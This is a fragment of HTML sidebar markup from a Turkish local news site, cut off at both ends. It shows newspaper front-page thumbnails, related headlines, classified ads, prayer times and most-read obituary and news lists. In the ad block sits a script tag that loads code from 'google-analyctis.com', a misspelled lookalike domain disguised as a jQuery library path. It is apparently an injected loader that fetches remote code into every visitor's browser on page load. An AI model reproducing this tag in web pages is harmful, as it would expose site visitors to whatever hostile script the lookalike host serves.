Tacirleri Tutuklandı haberleri">298 Adet Ecstasy Hapla Yakalanan Zehir Tacirleri Tutuklandı</a></div> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <div class="gazeteler"> <div id="carousel-gazeteler" class="carousel gazeteler slide"> <div class="box header black"> <h5 class="glyphicons bookmark" style="text-align:left;">GAZETE MANŞETLERİ</h5> <!-- <div class="pull-right"> <ol class="carousel-indicators"> <li data-target="#carousel-gazeteler" data-slide-to="0" class="active"></li> <li data-target="#carousel-gazeteler" data-slide-to="1"></li> <li data-target="#carousel-gazeteler" data-slide-to="2"></li> <li data-target="#carousel-gazeteler" data-slide-to="3"></li> <li data-target="#carousel-gazeteler" data-slide-to="4"></li> <li data-target="#carousel-gazeteler" data-slide-to="5"></li> <li data-target="#carousel-gazeteler" data-slide-to="6"></li> </ol> </div> --> </div> <div class="box content"> <div class="carousel-inner"> <div class="item active"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/aksam" title="Akşam" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-01-11//thumbs-150/aksam.jpg" alt="Akşam"/></div> <p>Akşam</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/dirilis-postasi" title="Diriliş Postası" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-01-11//thumbs-150/dirilis-postasi.jpg" alt="Diriliş Postası"/></div> <p>Diriliş Postası</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dunya" title="Dünya" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-01-11//thumbs-150/dunya.jpg" alt="Dünya"/></div> <p>Dünya</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dogru-haber" title="Doğru Haber" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-01-11//thumbs-150/dogru-haber.jpg" alt="Doğru Haber"/></div> <p>Doğru Haber</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/karar" title="Karar" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-01-11//thumbs-150/karar.jpg" alt="Karar"/></div> <p>Karar</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/korkusuz" title="Korkusuz" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-01-11//thumbs-150/korkusuz.jpg" alt="Korkusuz"/></div> <p>Korkusuz</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/milli-gazete" title="Milli Gazete" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-01-11//thumbs-150/milli-gazete.jpg" alt="Milli Gazete"/></div> <p>Milli Gazete</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/sozcu" title="Sözcü" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-01-11//thumbs-150/sozcu.jpg" alt="Sözcü"/></div> <p>Sözcü</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkiye-gazetesi" title="Türkiye" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-01-11//thumbs-150/turkiye-gazetesi.jpg" alt="Türkiye"/></div> <p>Türkiye</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkgun" title="Türkgün" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-01-11//thumbs-150/turkgun.jpg" alt="Türkgün"/></div> <p>Türkgün</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-akit" title="Yeni Akit" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-01-11//thumbs-150/yeni-akit.jpg" alt="Yeni Akit"/></div> <p>Yeni Akit</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yenicag" title="Yeniçağ" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-01-11//thumbs-150/yenicag.jpg" alt="Yeniçağ"/></div> <p>Yeniçağ</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-safak" title="Yeni Şafak" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-01-11//thumbs-150/yeni-safak.jpg" alt="Yeni Şafak"/></div> <p>Yeni Şafak</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/milat" title="Milat" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-01-11//thumbs-150/milat.jpg" alt="Milat"/></div> <p>Milat</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/aydinlik-gazetesi" title="Aydınlık" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-01-11//thumbs-150/aydinlik-gazetesi.jpg" alt="Aydınlık"/></div> <p>Aydınlık</p> </a> </div> </div> </div> </div> <a class="fl_ carousel-control left" href="#carousel-gazeteler" data-slide="prev">&lsaquo;</a> <a class="fl_ carousel-control right" href="#carousel-gazeteler" data-slide="next">&rsaquo;</a> </div> </div> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/ak-parti-ve-mhpden-ortak-aciklama-h68948.html" title="AK Parti ve MHP’den ortak açıklama"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/ak_parti_ve_mhpden_ortak_aciklama_h68948_14671.jpg" alt="AK Parti ve MHP’den ortak açıklama" /> <span>AK Parti ve MHP’den ortak açıklama</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/ikizpinardan-yol-genisletme-tesekkuru-h68947.html" title="İkizpınar’dan yol genişletme teşekkürü"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/ikizpinardan_yol_genisletme_tesekkuru_h68947_97357.jpg" alt="İkizpınar’dan yol genişletme teşekkürü" /> <span>İkizpınar’dan yol genişletme teşekkürü</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/elbistanspora-destek-icin-acilmisti-kapatma-karari-alindi-h68946.html" title="Elbistanspor’a destek için açılmıştı, kapatma kararı alındı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/elbistanspora_destek_icin_acilmisti_kapatma_karari_alindi_h68946_6543a.jpg" alt="Elbistanspor’a destek için açılmıştı, kapatma kararı alındı" /> <span>Elbistanspor’a destek için açılmıştı, kapatma...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/ozer-ve-sahinden-mehmet-gocere-gazeteciler-gunu-ziyareti-h68942.html" title="Özer ve Şahin’den Mehmet Göçer’e Gazeteciler Günü ziyareti"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/ozer_ve_sahinden_mehmet_gocere_gazeteciler_gunu_ziyareti_h68942_3b75d.jpg" alt="Özer ve Şahin’den Mehmet Göçer’e Gazeteciler Günü ziyareti" /> <span>Özer ve Şahin’den Mehmet Göçer’e Gazeteciler...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/ak-partiden-calisan-gazeteciler-gunu-ziyareti-h68940.html" title="AK Parti’den Çalışan Gazeteciler Günü ziyareti"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/ak_partiden_calisan_gazeteciler_gunu_ziyareti_h68940_9d22d.jpg" alt="AK Parti’den Çalışan Gazeteciler Günü ziyareti" /> <span>AK Parti’den Çalışan Gazeteciler Günü ziyareti</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/kosebalan-ve-yikansiz-gecen-gazeteciler-gunu-h68939.html" title="Kösebalan ve Yıkansız geçen gazeteciler günü"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/kosebalan_ve_yikansiz_gecen_gazeteciler_gunu_h68939_c5b3d.jpg" alt="Kösebalan ve Yıkansız geçen gazeteciler günü" /> <span>Kösebalan ve Yıkansız geçen gazeteciler günü</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/toplu-ulasima-zam-h68935.html" title="Toplu ulaşıma zam"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/toplu_ulasima_zam_h68935_b6791.jpg" alt="Toplu ulaşıma zam" /> <span>Toplu ulaşıma zam</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/gurbuz-aciz-sovunuza-ve-magazin-siyasetinize-araci-olmayacagim-h68934.html" title="Gürbüz: “Aciz şovunuza ve magazin siyasetinize aracı olmayacağım”"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/gurbuz_aciz_sovunuza_ve_magazin_siyasetinize_araci_olmayacagim_h68934_5d692.jpg" alt="Gürbüz: “Aciz şovunuza ve magazin siyasetinize aracı olmayacağım”" /> <span>Gürbüz: “Aciz şovunuza ve magazin siyasetinize...</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-13445.html" title="Kiralık Daire" >Kiralık Daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-13445.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/8f7eac5c9705299baca4f21caf2081b2a684e184.jpg" alt="Kiralık Daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/insaat-muhendisi-13438.html" title="İnşaat mühendisi" >İnşaat mühendisi</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/insaat-muhendisi-13438.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="İnşaat mühendisi" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/41-sifir-satlik-daire-13435.html" title="4+1 SIFIR SATLIK DAIRE" >4+1 SIFIR SATLIK DAIRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/41-sifir-satlik-daire-13435.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="4+1 SIFIR SATLIK DAIRE" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/b-sinifi-veya-motorsiklet-ehliyeti-olan-bay-eleman-13429.html" title="B Sınıfı veya motorsiklet ehliyeti olan bay eleman" >B Sınıfı veya motorsiklet ehliyeti olan bay eleman</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/b-sinifi-veya-motorsiklet-ehliyeti-olan-bay-eleman-13429.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="B Sınıfı veya motorsiklet ehliyeti olan bay eleman" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-tarlalar-13423.html" title="SATILIK TARLALAR" >SATILIK TARLALAR</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-tarlalar-13423.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SATILIK TARLALAR" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-13422.html" title="Satilik daire" >Satilik daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-13422.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Satilik daire" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/tecrubeli-bayan-satis-elemani-13418.html" title="tecrübeli bayan satış elemanı" >tecrübeli bayan satış elemanı</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/tecrubeli-bayan-satis-elemani-13418.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="tecrübeli bayan satış elemanı" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/tecrubeli-bayan-eleman-13417.html" title="TECRÜBELİ BAYAN ELEMAN" >TECRÜBELİ BAYAN ELEMAN</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/tecrubeli-bayan-eleman-13417.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="TECRÜBELİ BAYAN ELEMAN" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/ilkokul-ogrencilerine-ozel-ders-13414.html" title="İLKOKUL ÖĞRENCİLERİNE ÖZEL DERS" >İLKOKUL ÖĞRENCİLERİNE ÖZEL DERS</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/ilkokul-ogrencilerine-ozel-ders-13414.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="İLKOKUL ÖĞRENCİLERİNE ÖZEL DERS" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/acil-satilik-mustakil-2-katli-genis-ev-13407.html" title="ACİL SATILIK MÜSTAKİL 2 KATLI GENİŞ EV" >ACİL SATILIK MÜSTAKİL 2 KATLI GENİŞ EV</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/acil-satilik-mustakil-2-katli-genis-ev-13407.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/69b2722378c63a18fae8cd7d6dfc856a2dbcb08c.jpg" alt="ACİL SATILIK MÜSTAKİL 2 KATLI GENİŞ EV" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-is-yeri-110m2-13387.html" title="Satılık iş yeri 110m2" >Satılık iş yeri 110m2</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-is-yeri-110m2-13387.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/a36bae27685b37301a2ed83b619f036c5978ce60.jpg" alt="Satılık iş yeri 110m2" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-is-yeri-110m2-13386.html" title="Satılık iş yeri 110m2" >Satılık iş yeri 110m2</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-is-yeri-110m2-13386.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/edddcfaf4edaa2ed1a4c8d65958ff81413fd25aa.jpg" alt="Satılık iş yeri 110m2" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-is-yeri-110m2-13385.html" title="Satılık iş yeri 110m2" >Satılık iş yeri 110m2</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-is-yeri-110m2-13385.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/e61706f70d6c2b78d04c1b82285a4e2bf0759207.jpg" alt="Satılık iş yeri 110m2" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/pinarbasi-mahallesinde-satlik-daire-13370.html" title="Pinarbasi mahallesinde satlik daire" >Pinarbasi mahallesinde satlik daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/pinarbasi-mahallesinde-satlik-daire-13370.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Pinarbasi mahallesinde satlik daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-31-daire-13368.html" title="Kiralık 3+1 DAİRE" >Kiralık 3+1 DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-31-daire-13368.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/1597f39e27e91f9c76bcc506874258bcdf5dee42.jpg" alt="Kiralık 3+1 DAİRE" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="https://facebook.com/elbistaninsesi" target="blank" id="likes">40.4B</a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="https://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="https://twitter.com/elbistaninsesi" target="blank" id="followers">94</a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="https://twitter.com/elbistaninsesi" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td>06:14</td> <td>07:40</td> <td>12:45</td> <td>15:19</td> <td>17:40</td> <td>19:01</td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/silahli-kavgada-yaralanan-elbistanli-genc-hayatini-kaybetti-h68664.html" title="Silahlı kavgada yaralanan Elbistanlı..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/silahli_kavgada_yaralanan_elbistanli_genc_hayatini_kaybetti_h68664_9ffcb.jpg" alt="Silahlı kavgada yaralanan Elbistanlı..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/silahli-kavgada-yaralanan-elbistanli-genc-hayatini-kaybetti-h68664.html" title="" ><span class="en-hit">1.</span> <strong>Silahlı kavgada yaralanan Elbistanlı...</strong> <span class="en-spot en-hidden">Çalışmak için gittiği İstanbul’da çıkan kavgada silahla vurulan...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/otomobil-ucuruma-yuvarlandi-baba-oldu-oglu-yaralandi-h68780.html" title="Otomobil uçuruma yuvarlandı: baba..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/otomobil_ucuruma_yuvarlandi_baba_oldu_oglu_yaralandi_h68780_daed4.jpg" alt="Otomobil uçuruma yuvarlandı: baba..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/otomobil-ucuruma-yuvarlandi-baba-oldu-oglu-yaralandi-h68780.html" title="" ><span class="en-hit">2.</span> <strong>Otomobil uçuruma yuvarlandı: baba...</strong> <span class="en-spot en-hidden">Elbistan’dan kayısı almak için Malatya’nın Darende ilçesine giden...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/oguz-yilan-42-yasinda-h68863.html" title="Oğuz Yılan 42 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/oguz_yilan_42_yasinda_h68863_ee19a.jpg" alt="Oğuz Yılan 42 yaşında" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/oguz-yilan-42-yasinda-h68863.html" title="" ><span class="en-hit">3.</span> <strong>Oğuz Yılan 42 yaşında</strong> <span class="en-spot en-hidden">Oğuz Yılan 42 yaşında</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/whatsapp-vefat-hatti-h66390.html" title="WHATSAPP VEFAT HATTI" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/0/0/whatsapp_vefat_hatti_h66390_25b5e.jpg" alt="WHATSAPP VEFAT HATTI" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/whatsapp-vefat-hatti-h66390.html" title="" ><span class="en-hit">4.</span> <strong>WHATSAPP VEFAT HATTI</strong> <span class="en-spot en-hidden">VEFAT BİLGİLERİNİZİ AŞAĞIDAKİ NUMARAYA İLETİNİZ. YAYINLIYALIM.</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/guncel/gocugun-oldugu-bolgeden-ilk-goruntuler-ve-detaylar-h68798.html" title="Göçüğün olduğu bölgeden ilk..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/gocugun_oldugu_bolgeden_ilk_goruntuler_ve_detaylar_h68798_786bf.jpg" alt="Göçüğün olduğu bölgeden ilk..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/gocugun-oldugu-bolgeden-ilk-goruntuler-ve-detaylar-h68798.html" title="" ><span class="en-hit">5.</span> <strong>Göçüğün olduğu bölgeden ilk...</strong> <span class="en-spot en-hidden">Afşin-Elbistan Linyitleri (AEL) kömür sahasının, hafriyat döküm...</span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/fethi-celenk-76-yasinda-h68794.html" title="Fethi Çelenk 76 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/fethi_celenk_76_yasinda_h68794_ffb18.jpg" alt="Fethi Çelenk 76 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/fethi-celenk-76-yasinda-h68794.html" title="" ><span class="en-hit">1.</span> <strong>Fethi Çelenk 76 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/cazip-yekta-h68654.html" title="Cazip Yekta" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/cazip_yekta_h68654_8d700.jpg" alt="Cazip Yekta"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/cazip-yekta-h68654.html" title="" ><span class="en-hit">2.</span> <strong>Cazip Yekta</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/huseyin-gunes-64-yasinda-h68726.html" title="Hüseyin Güneş 64 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/huseyin_gunes_64_yasinda_h68726_d8933.jpg" alt="Hüseyin Güneş 64 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/huseyin-gunes-64-yasinda-h68726.html" title="" ><span class="en-hit">3.</span> <strong>Hüseyin Güneş 64 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/oguz-yilan-42-yasinda-h68863.html" title="Oğuz Yılan 42 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/oguz_yilan_42_yasinda_h68863_ee19a.jpg" alt="Oğuz Yılan 42 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/oguz-yilan-42-yasinda-h68863.html" title="" ><span class="en-hit">4.</span> <strong>Oğuz 